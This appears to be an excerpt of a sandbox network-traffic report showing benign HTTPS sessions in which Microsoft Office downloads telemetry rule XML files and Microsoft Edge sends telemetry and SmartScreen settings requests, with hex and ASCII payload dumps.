2024-11-11 09:33:25 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.5	49843	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 186f8a49-401e-005b-46d5-339c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093325Z-174f7845968cpnpfhC1EWR3afc0000000490000000008nu5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.5	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 31c5dea7-101e-008d-51d5-3392e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f78459685726chC1EWRsnbg00000004qg000000009ngn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:26 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.5	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: a7e44230-001e-0082-7dd5-335880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f7845968ljs8phC1EWRe6en00000004qg0000000008ve x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:26 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	49849	20.50.73.10	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	1044	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317604188&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 11681 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-11 09:33:26 UTC	11681	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 30 39 3a 33 33 3a 32 34 2e 31 38 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 30 62 66 63 61 64 37 2d 33 65 30 63 2d 34 34 37 33 2d 38 32 61 35 2d 31 36 32 32 37 34 39 62 39 39 37 31 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 39 32 38 33 34 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-11T09:33:24.187Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"c0bfcad7-3e0c-4473-82a5-1622749b9971","epoch":"4292834591"},"app":{"locale
2024-11-11 09:33:26 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=8dfd968a0a964b13bba2e07d788937a0&HASH=8dfd&LV=202411&V=4&LU=1731317606425; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 09:33:26 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=7f6d3bd4268f4bc2a19e0dae685c9951; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 10:03:26 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2237 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 09:33:26 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.5	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 1815e533-001e-0028-01d5-33c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f78459685726chC1EWRsnbg00000004tg000000004u1f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:26 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: c8358df5-201e-005d-53d5-33afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f7845968n2hr8hC1EWR9cag000000048g00000000amhu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:26 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 642c93e8-001e-0014-7cd5-335151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093326Z-174f78459684bddphC1EWRbht400000004eg000000005ahz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:26 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49848	20.50.73.10	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731317604192&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5025 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-11 09:33:26 UTC	5025	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 30 39 3a 33 33 3a 32 34 2e 31 39 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 30 62 66 63 61 64 37 2d 33 65 30 63 2d 34 34 37 33 2d 38 32 61 35 2d 31 36 32 32 37 34 39 62 39 39 37 31 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 39 32 38 33 34 35 39 31 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-11T09:33:24.192Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"c0bfcad7-3e0c-4473-82a5-1622749b9971","epoch":"4292834591"},"app":{"locale
2024-11-11 09:33:26 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=ea32d43fe19843eb9a2674b5c6a11b9e&HASH=ea32&LV=202411&V=4&LU=1731317606660; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 09:33:26 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=c9cc2c048c1a4700b794c40bd19b6a47; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 10:03:26 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2468 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 09:33:25 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	49856	4.150.155.223	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:26 UTC	698	OUT	POST /api/browser/edge/data/settings/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 718 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiNEdHZTJHQ0hvUEtuRFVRdHJnU3ZxUT09IiwgImhhc2giOiI5R1VJOHcyZXNQdz0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "2.0-0" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-11 09:33:26 UTC	718	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-11 09:33:26 UTC	302	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: application/octet-stream Content-Length: 130439 Connection: close Server: Kestrel ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1" Request-Context: appId=cid-v1:a302ffdc-66e2-4f15-929a-164afd2d2584
2024-11-11 09:33:26 UTC	16082	IN	Data Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
